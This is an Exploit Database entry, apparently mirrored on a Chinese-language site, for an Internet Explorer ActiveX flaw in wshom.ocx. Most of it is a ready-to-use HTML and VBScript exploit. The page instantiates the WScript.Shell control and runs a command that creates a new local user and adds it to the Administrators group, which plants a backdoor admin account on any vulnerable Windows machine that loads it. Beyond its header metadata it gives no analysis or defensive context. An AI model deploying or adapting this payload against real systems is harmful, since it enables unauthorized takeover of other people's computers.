Microsoft Internet Explorer – ‘wshom.ocx’ (Run) ActiveX Code Execution (Add Admin)

• Exploit Database
• 9 阅读

• 作者： Stack
  日期： 2010-01-22
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/11229/

• # Exploit Title: IE wshom.ocx (Run) ActiveX Remote Code Execution ( add admin user)
  # Date: 22/01/2010
  # Author: Stack
  # Version: ALL
  # Tested on: winsp2
  <html>
  </font></b></p>
  <p>
  <object classid='clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8' id='target'
  ></object>
  <script language='vbscript'>
  
  arg1="cmd /c net user username password /add && net localgroup Administrateurs username /add"
  
  target.run arg1
  
  </script></p>